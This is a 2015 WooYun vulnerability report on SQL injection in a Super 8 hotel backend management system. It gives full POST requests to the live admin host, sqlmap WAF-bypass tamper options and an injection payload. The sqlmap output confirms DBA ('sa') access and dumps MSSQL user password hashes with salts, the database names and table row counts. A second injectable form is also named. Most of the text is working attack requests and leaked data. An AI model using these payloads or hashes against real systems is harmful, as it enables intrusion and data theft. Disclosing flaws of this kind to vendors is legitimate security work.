速8酒店某后台管理系统存在SQL注入可绕过waf（DBA权限+数十万数据泄漏）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138076

漏洞标题：速8酒店某后台管理系统存在SQL注入可绕过waf（DBA权限+数十万数据泄漏）

漏洞作者：路人甲

提交时间：2015-08-31 11:15

修复时间：2015-10-15 12:12

公开时间：2015-10-15 12:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-31：细节已通知厂商并且等待厂商处理中
2015-08-31：厂商已经确认，细节仅向厂商公开
2015-09-10：细节向核心白帽子及相关领域专家公开
2015-09-20：细节向普通白帽子公开
2015-09-30：细节向实习白帽子公开
2015-10-15：细节向公众公开

简要描述：

不修改，那就可以进入后台测试测试了！~~~

详细说明：

WooYun: 速8酒店某后台管理系统存在弱口令（可修改所有酒店地址/负责人/应商等信息）
这里洞主已经列出了，可以可修改所有酒店地址/负责人/应商等信息，我就不来了，我来个后台找找注入的地方！
加--tamper between.py,randomcase.py,space2comment.py --dbms "Microsoft SQL Server"测试
1、第一处：新闻分类管理搜索

http://mys8.super8.com.cn:81/pages/bs/newstype/bs_newstypemanage.aspx (POST)
ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$UpdatePanel1|
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbI
sRecursionEX=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00
$ContentPlaceHolder1$ContentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
State=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$txtRemark=&__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUME
NT=&__VIEWSTATE=/wEPDwULLTEwMTEwNTkzNDkPFgIeCUFjdGlvblNJRAUgNUE1RjZDOTAzOUQzNDkzRUE4NTcwRDg4QjBD
NTcxNjMWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFgICAQ9kFgJmD2QWBgIBD2QWCgIDDw8WAh4HRW5hYmxlZGdkZAI
FDw8WAh8BaGRkAgcPDxYCHwFnZGQCCQ8PFgIfAWdkZAIPD2QWAmYPZBYCAgMPFgIeDVdhdGVybWFya1RleHQFFeivt%2Bi
%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwAJAgAPFgYeDU5ldmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGUFN0NvbnRlbnRQbGFjZ
UhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl90dkJTX05ld3NUeXBldDIeCUxhc3RJbmRleAIFZAgUKwADBQcwOjAsMDoxFCsAAh
YIHgRUZXh0BQzkuIvovb3kuK3lv4MeBVZhbHVlBSA4RDk2NDc5M0M1MDE0QTdCQTFCQjU2MUJBNDQxMTNGNB4ISW1hZ2VVc
mwFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMS5naWYeCEV4cGFuZGVkZxQrAAMFBzA6M
CwwOjEUKwACFgofBgUM5bi455So6LWE5rqQHwcFIDJFRjlDRjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEHwgFMX4vQ29y
ZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgeCFNlbGVjdGVkaGQUKwACFgofBgUM5qCH5
YeG6KeE6IyDHwcFIDVBNUY2QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYzHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeX
N0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmdkFCsAAhYIHwYFBuaWsOmXux8HBSBCMDEyRjc1MUZBMDU0QzlBQjU
wMUVGODdBNTZFOURDRh8IBTF
%2BL0NvcmVSZXNvdXJjZS9JbWFnZXMvU3lzdGVtTWFuYWdlL1RyZWVOb2RlMDEuZ2lmHwlnFCsAAgUDMDowFCsAAhYKHwYFK
TxkaXYgc3R5bGU9J2NvbG9yOlJlZCc%2B6Zeo5oi35paw6Ze7PC9kaXY
%2BHwcFIDRBNzVBNzNCMEU2QzRCQkY4QzIxMkY0OEQ4MkM0OTcyHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NY
W5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmhkZAIHD2QWAgIDD2QWAgIBDxAPFggeDkRhdGFWYWx1ZUZpZWxkBQpOZXdzV
HlwZUlEHg1EYXRhVGV4dEZpZWxkBQxOZXdzVHlwZU5hbWUeKkVzb2Z0X19TbWFydFRyZWVEcm9wRG93bkxpc3RfX1Jvb3RQYXJ
lbnRJRAUBMB4qRXNvZnRfX1NtYXJ0VHJlZURyb3BEb3duTGlzdF9fUGFyZW50Q29sdW1uBRBQYXJlbnROZXdzVHlwZUlEZBAVBQ0t
Leivt%2BmAieaLqS0tD%2BKVi%2BS4i
%2Bi9veS4reW/gxHilJxb5bi455So6LWE5rqQXRHilJxb5qCH5YeG6KeE6IyDXQnilYvmlrDpl7sVBQEwIDhEOTY0NzkzQzUwMTRBN0JB
MUJCNTYxQkE0NDExM0Y0IDJFRjlDRjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEIDVBNUY2QzkwMzlEMzQ5M0VBODU3M
EQ4OEIwQzU3MTYzIEIwMTJGNzUxRkEwNTRDOUFCNTAxRUY4N0E1NkU5RENGFCsDBWdnZ2dnFgFmZBgBBR5fX0NvbnRyb2xz
UmVxdWlyZVBvc3RCYWNrS2V5X18WAwVDY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2
xkZXIyJGNiSXNSZWN1cnNpb25FWAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZX
IyJHR2QlNfTmV3c1R5cGUFPmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRpYnRuQ
2FuY2Vs5U07fMf61YDhod3h/%2BOeNsTVqVFjG5HJllpepuJ8uDs
%3D&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_ExpandState=ennen&ContentPlaceHolder1_ContentPlaceHo
lder2_tvBS_NewsType_SelectedNode=ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Con
tentPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&

ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermarked存在注入。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearc
h$txtWatermarked
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentP
laceHolder2$UpdatePanel1|ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btn
Query&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbIsRecursionEX=on&ctl
00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermark
ed=1%' AND 2881=2881 AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$wtxtAdvancedSearch$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$Content
PlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00$ContentPlaceHolder1$Con
tentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHo
lder2$txtState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtRemark=&__EVENTTARGET=ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VI
EWSTATE=/wEPDwULLTEwMTEwNTkzNDkPFgIeCUFjdGlvblNJRAUgNUE1RjZDOTAzOUQzNDkzRUE4NTcw
RDg4QjBDNTcxNjMWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFgICAQ9kFgJmD2QWBgIBD2QWCgID
Dw8WAh4HRW5hYmxlZGdkZAIFDw8WAh8BaGRkAgcPDxYCHwFnZGQCCQ8PFgIfAWdkZAIPD2QWAmYPZBYC
AgMPFgIeDVdhdGVybWFya1RleHQFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwAJAgAPFgYeDU5l
dmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGUFN0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNl
SG9sZGVyMl90dkJTX05ld3NUeXBldDIeCUxhc3RJbmRleAIFZAgUKwADBQcwOjAsMDoxFCsAAhYIHgRU
ZXh0BQzkuIvovb3kuK3lv4MeBVZhbHVlBSA4RDk2NDc5M0M1MDE0QTdCQTFCQjU2MUJBNDQxMTNGNB4I
SW1hZ2VVcmwFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMS5naWYe
CEV4cGFuZGVkZxQrAAMFBzA6MCwwOjEUKwACFgofBgUM5bi455So6LWE5rqQHwcFIDJFRjlDRjI5N0ND
NDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2Uv
VHJlZU5vZGUwMy5naWYfCWgeCFNlbGVjdGVkaGQUKwACFgofBgUM5qCH5YeG6KeE6IyDHwcFIDVBNUY2
QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYzHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1N
YW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmdkFCsAAhYIHwYFBuaWsOmXux8HBSBCMDEyRjc1MUZBMDU0
QzlBQjUwMUVGODdBNTZFOURDRh8IBTF+L0NvcmVSZXNvdXJjZS9JbWFnZXMvU3lzdGVtTWFuYWdlL1Ry
ZWVOb2RlMDEuZ2lmHwlnFCsAAgUDMDowFCsAAhYKHwYFKTxkaXYgc3R5bGU9J2NvbG9yOlJlZCc+6Zeo
5oi35paw6Ze7PC9kaXY+HwcFIDRBNzVBNzNCMEU2QzRCQkY4QzIxMkY0OEQ4MkM0OTcyHwgFMX4vQ29y
ZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmhkZAIHD2QWAgID
D2QWAgIBDxAPFggeDkRhdGFWYWx1ZUZpZWxkBQpOZXdzVHlwZUlEHg1EYXRhVGV4dEZpZWxkBQxOZXdz
VHlwZU5hbWUeKkVzb2Z0X19TbWFydFRyZWVEcm9wRG93bkxpc3RfX1Jvb3RQYXJlbnRJRAUBMB4qRXNv
ZnRfX1NtYXJ0VHJlZURyb3BEb3duTGlzdF9fUGFyZW50Q29sdW1uBRBQYXJlbnROZXdzVHlwZUlEZBAV
BQ0tLeivt+mAieaLqS0tD+KVi+S4i+i9veS4reW/gxHilJxb5bi455So6LWE5rqQXRHilJxb5qCH5YeG
6KeE6IyDXQnilYvmlrDpl7sVBQEwIDhEOTY0NzkzQzUwMTRBN0JBMUJCNTYxQkE0NDExM0Y0IDJFRjlD
RjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEIDVBNUY2QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYz
IEIwMTJGNzUxRkEwNTRDOUFCNTAxRUY4N0E1NkU5RENGFCsDBWdnZ2dnFgFmZBgBBR5fX0NvbnRyb2xz
UmVxdWlyZVBvc3RCYWNrS2V5X18WAwVDY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250
ZW50UGxhY2VIb2xkZXIyJGNiSXNSZWN1cnNpb25FWAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9s
ZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHR2QlNfTmV3c1R5cGUFPmN0bDAwJGN0bDAwJENvbnRlbnRQ
bGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRpYnRuQ2FuY2Vs5U07fMf61YDhod3h/+OeNsTV
qVFjG5HJllpepuJ8uDs=&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_Expan
dState=ennen&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_SelectedNode=
ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Cont
entPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&
---
[09:22:41] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[09:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:22:41] [INFO] fetching current user
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 2
[09:22:41] [INFO] resumed: sa
current user:    'sa'
[09:22:41] [INFO] fetching current database
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 8
[09:22:41] [INFO] resumed: super8db
current database:    'super8db'
[09:22:41] [INFO] testing if current user is DBA
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[09:22:43] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True
database management system users [4]:
[*] ##MS_PolicyEventPr
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] n
database management system users password hashes:
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100b81612821c70d559c0381392a3e18659339515484385335f
        header: 0x0100
        salt: b8161282
        mixedcase: 1c70d559c0381392a3e18659339515484385335f
[*] myportal [1]:
    password hash: 0x01009b9f7553fbbca05677c781d8f3fd97fbe9b0326479c217ad
        header: 0x0100
        salt: 9b9f7553
        mixedcase: fbbca05677c781d8f3fd97fbe9b0326479c217ad
[*] sa [1]:
    password hash: 0x01002c6503ef9f84039673d6f5b1c6faa41f019ae40963430d2c
        header: 0x0100
        salt: 2c6503ef
        mixedcase: 9f84039673d6f5b1c6faa41f019ae40963430d2c
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: super8db
+--------------------------------------------------------+---------+
| Table                                                  | Entries |
+--------------------------------------------------------+---------+
| dbo.BN_StoreItemValueHis                               | 168405  |
| dbo.BN_StoreItemValue                                  | 34335   |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContent    | 14950   |
| dbo.DataOperateLogDetail                               | 12240   |
| dbo.BN_EvaluateActivityFranchiseStoreProject           | 6578    |
| dbo.BN_PunishmentActivityFranchiseStoreProjectRule     | 3564    |
| dbo.BehaviorLog                                        | 2875    |
| dbo.BN_PunishmentActivityFranchiseStoreProject         | 2376    |
| dbo.Log_StaffLoginHis                                  | 2110    |
| dbo.BN_PunishmentActivityFranchiseStore                | 1960    |
| dbo.BN_EvaluateActivityFranchiseStore                  | 1884    |
| dbo.DataOperateLog                                     | 1554    |
| dbo.BS_Area                                            | 1300    |
| dbo.BS_FranchiseStore                                  | 776     |
| dbo.BS_FranchiseStore2                                 | 508     |
| dbo.BN_BusinessFile                                    | 337     |
| dbo.BN_File                                            | 337     |
| dbo.BN_Su8CoinChangeDetail                             | 295     |
| dbo.BN_ConvertApply                                    | 287     |
| dbo.RolePermission                                     | 281     |
| dbo.BS_GoodsType                                       | 206     |
| dbo.BS_EvaluateProjectContent                          | 151     |
| dbo.Link                                               | 132     |
| dbo.bak_Link_20141201                                  | 127     |
| dbo.BS_Goods                                           | 125     |
| dbo.bak_Link_20140827                                  | 124     |
| dbo.bak_Link_0626                                      | 123     |
| dbo.bak_Link_0731                                      | 122     |
| dbo.bak_Link                                           | 120     |
| dbo.bak_Link_20140613                                  | 120     |
| dbo.BS_EvaluateProject                                 | 98      |
| dbo.bak_Link_0313                                      | 90      |
| dbo.Permission                                         | 83      |
| dbo.Module                                             | 81      |
| dbo.bak_Permission_20141201                            | 80      |
| dbo.bak_Module_20141201                                | 78      |
| dbo.bak_Permission_20140827                            | 78      |
| dbo.bak_Permission_0626                                | 77      |
| dbo.bak_Permission_0731                                | 77      |
| dbo.bak_Module_20140827                                | 76      |
| dbo.bak_Permission_20140613                            | 76      |
| dbo.bak_Module_0626                                    | 75      |
| dbo.bak_Module_0731                                    | 75      |
| dbo.bak_Module_20140613                                | 74      |
| dbo.bak_RolePermission                                 | 73      |
| dbo.bak_Permission                                     | 70      |
| dbo.BS_StoreItem                                       | 69      |
| dbo.UserRole                                           | 62      |
| dbo.bak_Permission_0313                                | 61      |
| dbo.bak_Module_0313                                    | 59      |
| dbo.WS_Dynamic                                         | 55      |
| dbo.BS_DataDictionary                                  | 54      |
| dbo.BN_EvaluateActivityProjectContent                  | 53      |
| dbo.BS_Supplier                                        | 48      |
| dbo.BN_Notice                                          | 42      |
| dbo.BS_SupplierType                                    | 40      |
| dbo.BS_ComplaintType                                   | 37      |
| dbo.BN_DepartmentNotice                                | 34      |
| dbo.BN_ConvertApply123                                 | 25      |
| dbo.BN_EvaluateActivityRuleSection                     | 23      |
| dbo.BN_EvaluateActivityProject                         | 22      |
| dbo.BN_ConvertProject                                  | 20      |
| dbo.BS_PunishmentProjectRule                           | 19      |
| dbo.Role                                               | 19      |
| dbo.BN_BusinessFormData                                | 18      |
| dbo.BN_PunishmentActivityProjectRule                   | 16      |
| dbo.BS_Department                                      | 15      |
| dbo.PermissionCategory                                 | 15      |
| dbo.bak_PermissionCategory                             | 14      |
| dbo.bak_PermissionCategory_0313                        | 13      |
| dbo.BS_Staff                                           | 13      |
| dbo.BN_Albums                                          | 12      |
| dbo.BS_EvaluateScoringCriteria                         | 12      |
| dbo.BN_Complaint                                       | 11      |
| dbo.BN_DepartmentInfo                                  | 11      |
| dbo.BN_StoreQuestion                                   | 11      |
| dbo.BN_TimeFlag                                        | 11      |
| dbo.BS_DataDictionaryType                              | 11      |
| dbo.WS_News                                            | 11      |
| dbo.ForgetPassword                                     | 10      |
| dbo.BN_DepartmentSection                               | 9       |
| dbo.BN_FormChildItem                                   | 9       |
| dbo.BN_ToDoListHistory                                 | 9       |
| dbo.BS_EvaluateCriteria                                | 8       |
| dbo.SSO                                                | 8       |
| dbo.BN_ConvertAuditLog                                 | 7       |
| dbo.BN_PunishmentActivityProject                       | 6       |
| dbo.BN_PunishmentActivityRuleSection                   | 6       |
| dbo.BS_DynamicType                                     | 6       |
| dbo.PC_ShoppingCartDetail                              | 6       |
| dbo.BN_ConvertActivityRuleSection                      | 5       |
| dbo.BS_NewsType                                        | 5       |
| dbo.BS_StoreType                                       | 5       |
| dbo.BN_DepartmentSectionDetail                         | 4       |
| dbo.BN_AlbumsType                                      | 3       |
| dbo.BN_ConvertActivity                                 | 3       |
| dbo.BN_ConvertActivityRule                             | 3       |
| dbo.BN_EvaluateActivity                                | 3       |
| dbo.BN_FormItem                                        | 3       |
| dbo.BN_PunishmentActivity                              | 3       |
| dbo.BN_PunishmentActivityRule                          | 3       |
| dbo.BS_PunishmentProject                               | 3       |
| dbo.PC_PurchasingOrderDetail                           | 3       |
| dbo.RoleCategory                                       | 3       |
| dbo.WS_MessageHis                                      | 3       |
| dbo.BN_ComplaintCase                                   | 2       |
| dbo.BN_EvaluateActivityFranchiseStoreAppeal            | 2       |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContentLog | 2       |
| dbo.BN_EvaluateActivityRule                            | 2       |
| dbo.BN_FormColumn                                      | 2       |
| dbo.BN_Su8CoinAdjustment                               | 2       |
| dbo.BN_ToDoList                                        | 2       |
| dbo.BS_FranchiseStoreStaff                             | 2       |
| dbo.BN_BusinessForm                                    | 1       |
| dbo.BN_Form                                            | 1       |
| dbo.BS_Franchisee                                      | 1       |
| dbo.BS_QuestionnaireMould                              | 1       |
| dbo.BS_QuestionnaireMouldQuestion                      | 1       |
| dbo.BS_QuestionnaireMouldQuestionAnswer                | 1       |
| dbo.PC_PurchasingOrder                                 | 1       |
| dbo.PC_ShoppingCart                                    | 1       |
| dbo.SubSystem                                          | 1       |
| dbo.WS_Message                                         | 1       |
| dbo.WS_Settings                                        | 1       |
+--------------------------------------------------------+---------+

2、自定义表单管理（高级查询）

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQspZVN1cGV
yOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cm
FsLCBQdWJsaWNLZXlUb2tlbj1udWxsAB4OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2Q
WAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCC
Q8PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgI
DDxYCHwMFFeivt%2Bi%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3Vy
Y2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJ
hZGlvQnV0dG9uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAICDw8
WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgIfCWVkZAIIDw8WAh8JZW
RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgICAg9kFghmDw8WAh8
CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBYCZg9kFgICAw9kFgYCBQ9kFgRmDw8WA
h4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1JpZ2h0ZGQCAg8PFgIfCwUGc2NMZWZ0ZGQCBw9kFgRmDw8WAh
8LBQdzY1JpZ2h0ZGQCAg8PFgIfCwUGc2NMZWZ0ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbH
VlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt%2BmAieaLqS0tCeW3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr%2Be8lui
%2BkQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ
5bey5Yig6ZmkCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y%2Bv57yW6L6RCeW3sueUn
%2BaViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ
2dnZ2dkZAIND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj
%2Bi/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L%2Bu5pS55pe26Ze0EuWIm%2BW7uueUqOaIt
%2BWQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnl
UaW1lDkNyZWF0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOW
AkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y
%2B3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb2
50ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb
2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvb
nRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZU
hvbGRlcjIkcmJ0bkFzY2VuZAU
%2BY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJG
N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29u
dGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQb
GFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFkrfnn7xrKbVNcmtfpEsNY77UTlUtql7qfbaSw
GxuOZPM%3D&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A

ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription、
